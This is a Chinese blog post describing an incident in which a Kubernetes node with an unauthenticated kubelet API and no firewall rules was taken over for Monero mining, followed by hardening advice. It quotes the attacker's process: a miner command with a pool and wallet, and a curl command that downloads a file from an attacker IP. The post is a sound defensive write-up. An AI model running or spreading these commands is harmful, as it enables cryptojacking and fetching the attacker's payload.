Loading [MathJax]/jax/output/CommonHTML/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >服务器变矿机,老板差点把我开除了。。。

服务器变矿机,老板差点把我开除了。。。

作者头像
dys
发布于 2021-11-02 02:29:31
发布于 2021-11-02 02:29:31
99400
代码可运行
举报
文章被收录于专栏:性能与架构性能与架构
运行总次数:0
代码可运行

作者:corvofeng

编辑:陶家龙

出处:https://corvo.myseu.cn/

近期遇到了一次我们自建 Kubernetes 集群中某台机器被入侵挖矿的情况,后续也找到了原因,所幸只是用来挖矿……

图片来自 Pexels

网络安全是个严肃的问题,它总是在不经意间出现,等你反应过来却已经迟了。希望各位读者看完后也有所启发,去检查及加固自己的集群。

入侵现象

检查到某台机器中出现了异常进程:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
./.system -o pool.supportxmr.com:3333 --donate-level=1 --coin=monero -u 46EPFzvnX5GH61ejkPpNcRNm8kVjs8oHS9VwCkKRCrJX27XEW2y1NPLfSa54DGHxqnKfzDUVW1jzBfekk3hrCVCm
curl -s http://45.9.148.35/scan_threads.dat

简单来讲,就是我们的机器被用来挖矿了……

问题出现后,我们第一时间关闭了 Docker,其实应该隔离下环境,把挖矿程序 dump 下来,以便后续分析。

具体原因排查

①iptables 为空

出现了异常进程,肯定是被入侵了,我首先看的是 iptables。果不其然,机器上的 iptables 规则是空的,意味着这台机器在裸奔。

②kubelet 裸奔

内部同事提出了有可能是 kubelet 被入侵的问题,检查过其他组件后,开始检查 kubelet 组件。

最后检查到 kubelet 日志中有异常:

③kubelet 设置不当

确认入侵问题,kubelet 参数设置错误,允许直接访问 kubelet 的 API

发现是 kubelet 的启动项中,该位置被注释掉:

然后文件中禁止匿名访问的配置没有读取。

该项配置是由于我操作不当注释掉的。

由于是新增加的机器,当晚就发现了问题,整个集群是我在管理的,我跟随着一起排查,所以很快就找到了原因。

当晚我就把其他机器中的配置项重新扫了一遍,假如它们的防火墙失效了,也会有类似的入侵情况发生,还好此次事件控制在 1 台机器中。

改进方案

其实该问题理论上讲是可以避免的,是因为出现了多层漏洞才会被有心人扫到。

我从外到内整理了一下可能改进的策略:

  • 机器防火墙设置,机器防火墙是整个系统最外层,即使机器的防火墙同步失败,也不能默认开放所有端口,而是应该全部关闭,等待管理员连接到 tty 终端上检查。
  • 使用机器时,假如机器不是暴露给外部使用的,公网 IP 可有可无的时候,尽量不要有公网IP,我们的机器才上线1天就被扫描到了漏洞,可想而知,公网上是多么的危险。
  • 使用 kubelet 以及其他系统服务时,端口监听方面是不是该有所考量?能不能不监听 0.0.0.0,而是只监听本机的内网 IP。
  • 使用 kubelet 以及其他程序,设计或是搭建系统时,对于匿名访问时的权限控制,我们需要考虑到假如端口匿名会出现什么问题,是否应该允许匿名访问,如果不允许匿名访问,那么怎么做一套鉴权系统?
  • 系统管理员操作时,是否有一个比较规范化的流程,是不是该只使用脚本操作线上环境?手动操作线上环境带来的问题并不好排查和定位。

我这里不是抛出疑问,只是想告诉大家,考虑系统设计时,有必要考虑下安全性。

总结

发生了入侵事件后,同事开玩笑说,还好没其他经济损失,要不我可能要回家了。

作为集群的管理员,只有自己最清楚问题的严重程度,从本质上来讲,问题已经相当严重了。入侵者相当于拥有了机器上 Docker 的完整控制权限。

因为此次事件的发生,不只是我,还有 SA 的同学基本都被 diao 了一遍,心里还是有点难受的,希望大家能对网络安全问题有所重视,从加固防火墙开始,避免监听不必要的端口,这两项至少是最容易实现的。

END

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-10-20,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 JAVA高性能架构 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
记一次 Kubernetes 中严重的安全问题
近期遇到了一次我们自建 Kubernetes 集群中某台机器被入侵挖矿, 后续也找到了原因, 所幸只是用来挖矿…
米开朗基杨
2021/03/31
7180
Redis服务器被劫持风波
作者:当年的春天 来源: http://blog.csdn.net/zhanghan18333611647/article/details/57128279 前言 俗话说安全猛于虎,之前多多
小小科
2018/05/02
1.9K0
Redis服务器被劫持风波
技术干货|如何高效破解挖矿攻击难题?
近年来,全球网络安全形势日趋严峻,APT攻击、勒索病毒、挖矿木马、供应链攻击等各种新型攻击手段层出不穷,严重影响着千行百业数字化转型的进程。
腾讯安全
2022/09/19
1.1K0
技术干货|如何高效破解挖矿攻击难题?
从零开始学安全:服务器被入侵后的自救指南
在这个信息爆炸的时代,网站就像我们现实世界中的家。你不会轻易让陌生人破门而入,更不会允许他们在你家里藏钥匙、留后门。
云惑雨问
2025/06/17
1090
从零开始学安全:服务器被入侵后的自救指南
Linux 服务器安全简明指南
现在让我们强化你的服务器以防止未授权访问。 -- Phil Zona 本文导航 -经常升级系统00% -自动安全更新02% -添加一个受限用户账户07% -CentOS / Fedora11% -Ubuntu13% -Debian15% -加固 SSH 访问21% -创建验证密钥对23% -SSH 守护进程选项43% -使用 Fail2Ban 保护 SSH 登录54% -删除未使用的面向网络的服务58% -查明运行的服务59% -查明该移除哪个服务80% -卸载监听的服务87% -配置防火墙90% -接
小小科
2018/05/04
1.9K0
Linux 服务器安全简明指南
服务器中勒索病毒和挖矿原因分析与处理
近期买了机器来体验最新的一些功能,在成都区。因为需要一些特定的动作,为了保持测试的连通性,就没有做任何的安全防护措施。在反复几个版本以后,就测试完毕了,结果没想到没多久就被入侵。
相柳
2024/03/26
7460
服务器中勒索病毒和挖矿原因分析与处理
实战某高校的一次挖矿病毒的应急处置
因为检测和处置的时间安排了明天,在这个时间里可以收集一下信息,这里给大家一个自己总结的信息收集表。
FB客服
2022/11/14
9730
实战某高校的一次挖矿病毒的应急处置
记一次服务器被当肉鸡挖矿的经历
看样子像是服务器被挂马了,首先应该检查服务器是否有可疑的定时任务。使用crontab -l命令来查看当前的服务器的定时任务。经检查后发现并无异常,只能看下这个进程的具体信息了。
程序员小猿
2021/01/19
3.9K0
记一次服务器被当肉鸡挖矿的经历
【教你搭建服务器系列】(7)一次服务器被黑的排查全过程
发现并没有异常的IP,这倒是不奇怪,假如真的被登录了,登录日志被删除的可能性也是很大的。
HaC
2021/12/07
1.1K0
【教你搭建服务器系列】(7)一次服务器被黑的排查全过程
Linux 服务器端口不可访问问题排查
项目中使用的服务器是物理机,使用 centos 7.6 版本的操作系统, 4 个千兆网口,上架时间 23 年 8 月份。部署在内网机房,并且在内网机房分配的固定IP 是 172.87.7.249,并在机器上部署了 docker,
磊叔的技术博客
2025/06/07
1410
Linux 服务器端口不可访问问题排查
day11 | 网络安全应急响应典型案例(挖矿类)
近几年,除勒索病毒外,挖矿木马也越来越流行,多为利用漏洞利用、“永恒之蓝下载器”、弱口令暴破等手段完成攻击,由于其具有较强的隐蔽性,会利用一些手段避开受害者活动时间,利用受害者空闲时间进行挖矿,长此以往,服务器、主机显卡或CPU长期占用过高,导致电脑性能降低,同时攻击者会利用已控制的挖矿主机攻击其他设备,导致业务中断甚至更严重的网络安全事件的发生。
亿人安全
2023/09/25
2.1K0
day11 | 网络安全应急响应典型案例(挖矿类)
浅谈如何保障服务器安全
通常,我们拿到一台服务器后使用338端口远程桌面登录windows系统,使用22端口ssh登录linux系统。如果隔一段时间稍微留意一下爆破日志,通常能够看到来自全球各地的ip在爆破我们的登录账号密码。
中龙技术
2022/09/28
7920
浅谈如何保障服务器安全
对某台服务器事件日志的分析
进程有规律,短时间内频繁操作。发生该操作的原因最大可能是有重要的文件将要被修改,360防火墙的策略将其禁止。如此频繁的操作是很可疑的。
黑伞安全
2019/10/16
2.3K1
对某台服务器事件日志的分析
不容错过 | “永恒之蓝”勒索病毒安全处置FAQ
病毒相关 Q 为什么此次勒索病毒“永恒之蓝”感染人数如此之多? A 此次勒索软件利用了NSA黑客武器库泄漏的“永恒之蓝”工具进行网络感染,只要是Windows XP、Windows2003、Windows Vista、Windows7 、Windows 2008、Windows 10、Windows2012,对外开放445端口(系统默认开放)且没有更新微软官方MS17-010漏洞补丁的均有可能被感染,而在国内符合这些条件的PC主机数量非常大,而且经过安恒信息安全专家分析发现该病毒可以通过智能生成IP地址进行
安恒信息
2018/04/11
3.1K0
不容错过 | “永恒之蓝”勒索病毒安全处置FAQ
Linux安全加固:保护你的服务器
🐱 猫头虎博主今天要讲安全啦!在互联网的世界中,数据安全和隐私保护日益受到重视。作为服务器管理员,如何保护你的Linux服务器免受攻击呢?本篇文章将为你揭示Linux安全加固的各种策略和技巧,确保你的服务器坚如磐石。为了让更多的管理员和IT专家能够快速找到这份宝贵的指南。🔐
猫头虎
2024/04/09
2860
Kubernetes 基础架构与环境准备Containerd、Kubeadm、Kubelet、Kubectl 初探
现在运维都说——要上 Kubernetes,才能跟上时代脚步。”听上去很厉害,可真要动手时却傻眼了:网上各种教程,看不懂到底安装哪些组件?一头雾水:“Docker 都还没学精,哪里还会 Kubernetes 的那些kube-apiserver、kube-scheduler、kube-controller-manager……还听说新版不推荐 Docker,还要装 Containerd。我怕半路命令报错,又怕只学一堆概念不会用,还容易搭坏集群。
IT咸鱼
2025/06/09
2010
Kubernetes 基础架构与环境准备Containerd、Kubeadm、Kubelet、Kubectl 初探
hvv行动的一些面试经验(hw行动)
使用lcx或直接上线cs,建立隧道以便于对内网进一步进行攻击。(使用frp、nps也是一样的)
黑战士
2024/05/20
5420
5000字解析:实战化场景下的容器安全攻防之道
在这个数字化转型关键时期,以容器为代表的云原生技术凭借自身的优势,正在逐渐成为核心IT基础设施。云原生已经不再是少部分“创新者”的特权,而是成为了市场主流选择,容器、容器云逐渐成为工作负载的主流形态。
Khan安全团队
2022/07/13
9650
5000字解析:实战化场景下的容器安全攻防之道
Linux运维人员应该知道的Linux服务器安全指南
今天小编要跟大家分享的文章是关于Linux运维人员应该知道的Linux服务器安全指南。熟悉Linux运维工作的小伙伴都知道Linux服务器安全在运维工作中非常重要。今天小编在文章中来跟大家说一说如何强化你的服务器以防止未授权访问。下面我们一起来看一看吧~
小小科
2020/05/21
2.5K0
服务器被攻击分析?
那么按照现在还能偶尔连上,还能偶尔操作下,而且程序都正常。估计是被当做肉鸡了。因为如果是被攻击了。比如被DDOS攻击了,那么,首先是连上的机会是几乎没有的,而且程序几乎是挂了。
咻一咻
2020/05/29
4.3K0
相关推荐
记一次 Kubernetes 中严重的安全问题
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验